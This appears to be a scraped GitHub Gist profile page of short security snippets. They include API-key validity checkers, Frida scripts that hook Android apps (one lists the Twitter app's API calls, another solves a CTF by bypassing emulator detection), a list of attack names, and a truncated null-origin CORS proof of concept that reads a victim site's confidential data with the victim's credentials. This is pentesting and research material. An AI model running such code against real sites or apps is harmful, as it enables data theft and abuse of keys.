Skip to content

Instantly share code, notes, and snippets.

💭
Hacking ...

αvιcoder avicoder

💭
Hacking ...
Block or report user

Report or block avicoder

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@avicoder
avicoder / reg.md
Last active Jan 21, 2019
Regex Fun
View reg.md
  • 1

/d+

#2

([\da-f]{2}:?){6}

#3

@avicoder
avicoder / gcp-api-key-check.py
Created Aug 31, 2018
Check the google api key is valid or not.
View gcp-api-key-check.py
import googlemaps
from datetime import datetime
gmaps = googlemaps.Client(key='Add Your Key here')
# Geocoding an address
geocode_result = gmaps.geocode('1600 Amphitheatre Parkway, Mountain View, CA')
# Look up an address with reverse geocoding
reverse_geocode_result = gmaps.reverse_geocode((40.714224, -73.961452))
@avicoder
avicoder / Random-hacks.md
Last active Jul 7, 2018
View Random-hacks.md
@avicoder
avicoder / Mapbox.py
Created May 16, 2018
Check for key validation
View Mapbox.py
from mapbox import Geocoder
def banner():
return "\n[*] "
def mapbox():
API_TOKEN = raw_input("Enter the Mapbox API key here and press enter:\n")
token_type = API_TOKEN[:2]
@avicoder
avicoder / list-url.py
Created Apr 30, 2018
Frida script to get the list of all API calls from a twitter android app in real time.
View list-url.py
#! /usr/bin/python
# Usage `python list-url.py`
import frida,sys
jspayload= """
setImmediate(function() {
@avicoder
avicoder / reverzeMe1.js
Created Apr 27, 2018
ReverzeMe solution in frida
View reverzeMe1.js
setImmediate(function() {
Java.perform(function() {
//Saving retval
retval = Java.use("java.lang.Boolean").$new("False");
chalJNI = Java.use("com.example.reverzeme.ChallengeJNI");
chalJNI.checkIfDeviceIsEmulator.implementation = function(v) {
@avicoder
avicoder / android-load-classes.js
Created Apr 26, 2018
https://www.mavensecurity.com/blog/getting-started-with-frida-on-android - Fix
View android-load-classes.js
"use strict";
/* Check if a Java/Dalvik/ART VM is available */
if (Java.available) {
//FIX - Need to be inside perform
Java.perform(function() {
/* enumerate loaded classes */
@avicoder
avicoder / Null-origin-code.html
Created Apr 24, 2018
View Null-origin-code.html
<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
if (xhr.readyState === xhr.DONE) {
console.log(xhr.response);
}
@avicoder
avicoder / Keybase.md
Last active Dec 26, 2017
View Keybase.md

Keybase proof

I hereby claim:

  • I am avicoder on github.
  • I am avicoder (https://keybase.io/avicoder) on keybase.
  • I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo

To claim this, I am signing this object:

@avicoder
avicoder / Attacks.md
Last active Dec 10, 2017
Get an Idea about Each one
View Attacks.md
  • Arbitrary file access
  • Binary planting
  • Blind SQL Injection
  • Blind XPath Injection
  • Brute force attack
  • Buffer overflow attack
  • Cache Poisoning
  • Cash Overflow
  • Clickjacking
  • Command injection attacks
You can’t perform that action at this time.